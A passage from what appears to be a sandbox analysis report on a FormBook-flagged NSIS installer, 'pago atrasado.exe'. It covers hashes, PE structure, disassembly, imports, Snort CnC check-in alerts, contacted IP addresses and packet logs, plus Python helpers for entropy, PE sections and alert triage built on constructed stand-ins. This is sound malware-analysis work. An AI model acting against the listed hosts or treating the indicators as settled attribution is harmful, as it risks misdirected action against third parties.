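threshold for calling a blob encrypted/compressed is an assumption here."""
import hashlib
import math
import os
from collections import Counter

ENCRYPTED_THRESHOLD = 7.9  # assumption: near-maximal entropy => encrypted or compressed


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for empty or constant input, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe_blob(data: bytes) -> dict:
    """Hash and characterise an in-memory blob like a 'Created / dropped Files' entry."""
    ent = shannon_entropy(data)
    return {
        "size": len(data),
        "entropy": ent,
        "encrypted": ent >= ENCRYPTED_THRESHOLD,
        "pe": data[:2] == b"MZ",          # cheap PE check before trusting the entropy verdict
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def describe_file(path: str) -> dict:
    """Same metadata for a file on disk (e.g. the %TEMP% drops listed above)."""
    with open(path, "rb") as fh:
        return describe_blob(fh.read())


# Constructed stand-ins for the two drops above: a small PE-like blob (MZ header,
# DOS stub text, mostly zero padding) and 64 KiB of random bytes, the shape of the
# high-entropy 'upukqvxhfh' payload. Neither is the real file.
PLUGIN_LIKE = b"MZ" + b"\x00" * 62 + b"This program cannot be run in DOS mode." + b"\x00" * 400
PAYLOAD_LIKE = os.urandom(65536)

if __name__ == "__main__":
    for name, blob in (("plugin-like", PLUGIN_LIKE), ("payload-like", PAYLOAD_LIKE)):
        info = describe_blob(blob)
        print(f"{name}: size={info['size']} entropy={info['entropy']:.3f} "
              f"encrypted={info['encrypted']} pe={info['pe']} sha256={info['sha256']}")
```

Entropy alone does not separate encryption from compression, and a packed PE can still carry a readable MZ header: the NSIS stub's own .text sits at 6.42 bits while the blob is at 7.99, so the verdict is a triage signal that tells you which drop to unpack next, not a classification.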

                                          Static File Info

                                          General

                                          File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit): 7.9390817972262315
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name: pago atrasado.exe
                                          File size: 288183
                                          MD5: f841c72b1c4cadc4c98903ad26a96a16
                                          SHA1: 06359aaf42a5ce60889ab7a93d8af7702b34630a
                                          SHA256: eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
                                          SHA512: b80671d608aab3309567326b552a969245e448cd272e635a74abde9082d455e11f9d264928c61647d4b52b183c85425d3933fcffa4093b4453463e295f768f37
                                          SSDEEP: 6144:wBlL/cQMpuMEI8xf6S6s4SOTJoR6qMdayJ5rSFb1e7uuUI0vVLM:CeQMzEDxf6I8J3dTXuuUbI
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint: 0x4030fb
                                          Entrypoint Section: .text
                                          Digitally signed: false
                                          Imagebase: 0x400000
                                          Subsystem: windows gui
                                          Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics: TERMINAL_SERVER_AWARE
                                          Time Stamp: 0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                          TLS Callbacks: (none)
                                          CLR (.Net) Version: (none)
                                          OS Version Major: 4
                                          OS Version Minor: 0
                                          File Version Major: 4
                                          File Version Minor: 0
                                          Subsystem Version Major: 4
                                          Subsystem Version Minor: 0
                                          Import Hash: b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction (disassembly from the entry point; the comments identify Win32 constants and call shapes that match the NSIS stub the file type indicates, with the callee named only where the import table supports it)
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx                          ; ebx = 0, reused as NULL/FALSE below
                                          push 00008001h                        ; SEM_FAILCRITICALERRORS | SEM_NOOPENFILEERRORBOX
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]            ; import call consuming the 0x8001 flag; SetErrorMode is in the import table
                                          call dword ptr [004070ACh]            ; import call whose low word is compared with 6 (major 6, minor 0 in GetVersion's packing); GetVersion is imported
                                          cmp ax, 00000006h
                                          je 00007F34348B3B53h
                                          push ebx
                                          call 00007F34348B6934h                ; internal helper returning a function pointer in eax, or 0
                                          cmp eax, ebx
                                          je 00007F34348B3B49h
                                          push 00000C00h                        ; LOAD_LIBRARY_SEARCH_SYSTEM32 | LOAD_LIBRARY_SEARCH_USER_DIRS
                                          call eax                              ; DLL search-path hardening, as the NSIS 3 stub does at start-up
                                          mov esi, 00407280h                    ; start of a NUL-separated string table
                                          push esi
                                          call 00007F34348B68B0h                ; internal routine applied to each string
                                          push esi
                                          call dword ptr [00407108h]            ; import call returning a length; lstrlenA is imported
                                          lea esi, dword ptr [esi+eax+01h]      ; advance to the next string
                                          cmp byte ptr [esi], bl
                                          jne 00007F34348B3B2Dh                 ; loop until the empty terminator
                                          push 0000000Dh
                                          call 00007F34348B6908h
                                          push 0000000Bh
                                          call 00007F34348B6901h
                                          mov dword ptr [00423F44h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [00423FF8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h                        ; 0x160 = sizeof(SHFILEINFOA)
                                          push eax
                                          push ebx
                                          push 0041F4F0h
                                          call dword ptr [0040715Ch]            ; five-argument import call shaped like SHGetFileInfoA(path, 0, &sfi, 0x160, 0), which is imported
                                          push 0040915Ch
                                          push 00423740h
                                          call 00007F34348B6534h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F34348B6522h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x9e0 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.665123980978 | data | 6.42230569414 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.20291736659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data | 0x9000 | 0x1b038 | 0x600 | False | 0.432291666667 | data | 4.0475118296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x2d000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.50948350161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
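The section table is the first place to look for an in-place unpacker: here every section is either read+execute (.text) or read+write (.data, .ndata), never both, and the only region with notable entropy is .text at 6.42, so the stub itself is a plain NSIS loader and the interesting code is in what it drops. The added example below is not the sandbox's parser, and its input is a PE32 image constructed inline rather than the sample; it walks the section table and derives the same columns: decoded IMAGE_SCN_* flags, raw-data entropy, which section contains AddressOfEntryPoint (the "Entrypoint Section" line above), and any section that is writable and executable at once.

```python
"""Parse a PE32 section table: name, RVA, sizes, decoded IMAGE_SCN_* flags,
raw-data entropy, the section holding the entry point, and RWX sections.

Added example, not the sandbox's own parser. The image is constructed inline
(build_minimal_pe) and is not the analysed sample."""
import math
import struct
from collections import Counter

SCN_FLAGS = {  # IMAGE_SCN_* bits from the PE/COFF specification
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def entropy(data: bytes) -> float:
    """8-bit Shannon entropy (0.0 .. 8.0) of a byte string."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(image: bytes) -> list:
    """Return one dict per section header; raises ValueError on non-PE32 input."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled")
    entry_rva = struct.unpack_from("<I", image, opt + 16)[0]  # AddressOfEntryPoint
    out = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HDR, image, opt + opt_size + 40 * i)
        name, vsize, va, rawsize, rawptr, chars = f[0], f[1], f[2], f[3], f[4], f[9]
        raw = image[rawptr:rawptr + rawsize]
        out.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va, "vsize": vsize, "rawsize": rawsize,
            "entropy": round(entropy(raw), 4),
            "flags": [label for bit, label in SCN_FLAGS.items() if chars & bit],
            "has_entrypoint": va <= entry_rva < va + max(vsize, rawsize),
            "rwx": bool(chars & 0x80000000) and bool(chars & 0x20000000),
        })
    return out


def entrypoint_section(sections: list) -> str:
    return next((s["name"] for s in sections if s["has_entrypoint"]), "")


def rwx_sections(sections: list) -> list:
    """Sections an unpacker could decrypt and then execute without changing page rights."""
    return [s["name"] for s in sections if s["rwx"]]


def build_minimal_pe() -> bytes:
    """Constructed PE32 with read/execute code, read/write data and one RWX section."""
    secs = [  # (name, RVA, characteristics, raw bytes)
        (b".text", 0x1000, 0x60000020, bytes([0x55, 0x8B, 0xEC, 0xC3]) * 64),  # R+X code, entropy 2.0
        (b".data", 0x2000, 0xC0000040, b"\x00" * 256),                         # R+W data, entropy 0.0
        (b".pack", 0x3000, 0xE0000020, bytes(range(256)) * 2),                 # R+W+X, entropy 8.0
    ]
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1010)     # AddressOfEntryPoint inside .text
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x0102)
    table, bodies, ptr = bytearray(), bytearray(), 0x200
    for name, va, flags, raw in secs:
        table += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(raw), va, len(raw), ptr, 0, 0, 0, 0, flags)
        bodies += raw
        ptr += len(raw)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)     # e_lfanew: PE header right after the DOS header
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)).ljust(0x200, b"\0") + bytes(bodies)


if __name__ == "__main__":
    secs = parse_sections(build_minimal_pe())
    for s in secs:
        print(f"{s['name']:<8} va=0x{s['va']:x} raw=0x{s['rawsize']:x} entropy={s['entropy']:.2f} {', '.join(s['flags'])}")
    print("entry point in:", entrypoint_section(secs), "| RWX sections:", rwx_sections(secs))
```

Run against a real file with `parse_sections(open(path, "rb").read())`. The RWX check only covers page rights declared in the header; a stager that allocates with VirtualAlloc or flips rights with VirtualProtect at run time leaves the static table clean, which is why the dynamic "changes PE section rights" style of detection exists alongside this static one.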

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_ICON | 0x2d190 | 0x2e8 | data | English | United States
                                          RT_DIALOG | 0x2d478 | 0x100 | data | English | United States
                                          RT_DIALOG | 0x2d578 | 0x11c | data | English | United States
                                          RT_DIALOG | 0x2d698 | 0x60 | data | English | United States
                                          RT_GROUP_ICON | 0x2d6f8 | 0x14 | data | English | United States
                                          RT_MANIFEST | 0x2d710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                          Imports

                                          DLL: Imports
                                          KERNEL32.dll: GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dll: SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dll: RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation system | Country where language is spoken
                                          English | United States

                                          Network Behavior

                                          Snort IDS Alerts

                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          10/13/21-16:44:25.292716 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          10/13/21-16:44:25.292716 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          10/13/21-16:44:25.292716 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          10/13/21-16:44:25.406375 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          10/13/21-16:44:46.515561 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          10/13/21-16:44:46.515561 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          10/13/21-16:44:46.515561 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49793 | 80 | 192.168.2.5 | 74.208.236.134
                                          10/13/21-16:45:02.310893 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          10/13/21-16:45:02.310893 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          10/13/21-16:45:02.310893 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49797 | 80 | 192.168.2.5 | 3.64.163.50
                                          10/13/21-16:45:07.452062 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49798 | 23.227.38.74 | 192.168.2.5
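The table pairs three outbound check-ins (SIDs 2031453, 2031449 and 2031412 all firing on the same GET) with two 403 responses, one of which, from 23.227.38.74 on client port 49798, has no matching check-in alert at all. The added example below is not part of the report: it rebuilds the alerts in Snort's fast output format, constructed from the table because the report shows only the tabulated fields (the classification text and rule revisions in the sample lines are made up), and groups them per remote host so that gap is visible.

```python
"""Triage Snort 'fast' alerts from a sandbox run: which hosts the sample tried
to check in with, which rules fired per host, and which servers answered 403.

Added example, not part of the report. SAMPLE_ALERTS is constructed from the
Snort table in the report; classification text and rule revisions are invented."""
import re
from collections import defaultdict

FAST_RE = re.compile(
    r"^(?P<ts>\S+) \[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.+?) \[\*\*\]"
    r".*?\{(?P<proto>\w+)\} (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$"
)
LOCAL_PREFIX = "192.168.2."  # the sandbox guest's network, as seen in the table

SAMPLE_ALERTS = """\
10/13/21-16:44:25.292716 [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49790 -> 34.102.136.180:80
10/13/21-16:44:25.292716 [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49790 -> 34.102.136.180:80
10/13/21-16:44:25.292716 [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49790 -> 34.102.136.180:80
10/13/21-16:44:25.406375 [**] [1:1201:8] ATTACK-RESPONSES 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 34.102.136.180:80 -> 192.168.2.5:49790
10/13/21-16:44:46.515561 [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49793 -> 74.208.236.134:80
10/13/21-16:44:46.515561 [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49793 -> 74.208.236.134:80
10/13/21-16:44:46.515561 [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49793 -> 74.208.236.134:80
10/13/21-16:45:02.310893 [**] [1:2031453:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49797 -> 3.64.163.50:80
10/13/21-16:45:02.310893 [**] [1:2031449:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49797 -> 3.64.163.50:80
10/13/21-16:45:02.310893 [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.5:49797 -> 3.64.163.50:80
10/13/21-16:45:07.452062 [**] [1:1201:8] ATTACK-RESPONSES 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 23.227.38.74:80 -> 192.168.2.5:49798
"""


def parse_fast_alerts(text: str) -> list:
    """Parse fast-format lines into dicts; lines that do not match are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_RE.match(line.strip())
        if not m:
            continue
        a = m.groupdict()
        for key in ("gid", "sid", "rev", "sport", "dport"):
            a[key] = int(a[key])
        alerts.append(a)
    return alerts


def triage(alerts: list) -> dict:
    """Per remote host: outbound check-in SIDs and client ports, inbound response messages."""
    hosts = defaultdict(lambda: {"checkin_sids": set(), "client_ports": set(), "responses": set()})
    for a in alerts:
        outbound = a["src"].startswith(LOCAL_PREFIX)
        remote = a["dst"] if outbound else a["src"]
        if outbound and "CnC Checkin" in a["msg"]:
            hosts[remote]["checkin_sids"].add(a["sid"])
            hosts[remote]["client_ports"].add(a["sport"])
        elif not outbound and a["msg"].startswith("ATTACK-RESPONSES"):
            hosts[remote]["responses"].add(a["msg"])
    return dict(hosts)


def checkin_targets(hosts: dict) -> list:
    return sorted(h for h, rec in hosts.items() if rec["checkin_sids"])


def responders_without_checkin(hosts: dict) -> list:
    """Servers that answered but whose request never tripped a check-in rule."""
    return sorted(h for h, rec in hosts.items() if rec["responses"] and not rec["checkin_sids"])


if __name__ == "__main__":
    hosts = triage(parse_fast_alerts(SAMPLE_ALERTS))
    for host in sorted(hosts):
        rec = hosts[host]
        print(f"{host:<16} sids={sorted(rec['checkin_sids'])} ports={sorted(rec['client_ports'])} "
              f"responses={sorted(rec['responses'])}")
    print("check-in targets:", checkin_targets(hosts))
    print("answered without a check-in alert:", responders_without_checkin(hosts))
```

Two caveats fall out of the grouping. FormBook walks a list of configured domains of which most are decoys, so a 403 from 34.102.136.180 says nothing about whether that host was the live C2. And the 23.227.38.74 flow (client port 49798) returned a 403 without any check-in rule firing, so the alert list under-counts the hosts the sample spoke to; the packet capture, not the alert table, is the record to enumerate contacted hosts from.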

                                          Network Port Distribution

                                          TCP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 13, 2021 16:44:14.514519930 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:14.661742926 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.661844015 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:14.661981106 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:14.810870886 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906196117 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906234980 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906253099 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906270027 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906289101 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906325102 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906372070 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:14.906387091 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:14.906414986 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:14.956698895 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.011696100 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.053379059 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.053442001 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.053488970 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.053539991 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.053559065 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.053606987 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.097364902 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.103019953 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.103055954 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.103141069 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.160053015 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.199894905 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.199920893 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.199973106 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.200011015 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:15.306546926 CEST | 80 | 49787 | 208.91.197.27 | 192.168.2.5
                                          Oct 13, 2021 16:44:15.307334900 CEST | 49787 | 80 | 192.168.2.5 | 208.91.197.27
                                          Oct 13, 2021 16:44:25.274435043 CEST | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          Oct 13, 2021 16:44:25.292285919 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          Oct 13, 2021 16:44:25.292598009 CEST | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          Oct 13, 2021 16:44:25.292716026 CEST | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          Oct 13, 2021 16:44:25.310540915 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          Oct 13, 2021 16:44:25.406374931 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          Oct 13, 2021 16:44:25.406408072 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          Oct 13, 2021 16:44:25.406739950 CEST | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          Oct 13, 2021 16:44:25.406987906 CEST | 49790 | 80 | 192.168.2.5 | 34.102.136.180
                                          Oct 13, 2021 16:44:25.424902916 CEST | 80 | 49790 | 34.102.136.180 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.083808899 CEST | 49791 | 80 | 192.168.2.5 | 46.101.121.244
                                          Oct 13, 2021 16:44:41.114418030 CEST | 80 | 49791 | 46.101.121.244 | 192.168.2.5
                                          Oct 13, 2021 16:44:41.114691019 CEST | 49791 | 80 | 192.168.2.5 | 46.101.121.244
                                          Oct 13, 2021 16:44:41.115659952 CEST | 49791 | 80 | 192.168.2.5 | 46.101.121.244
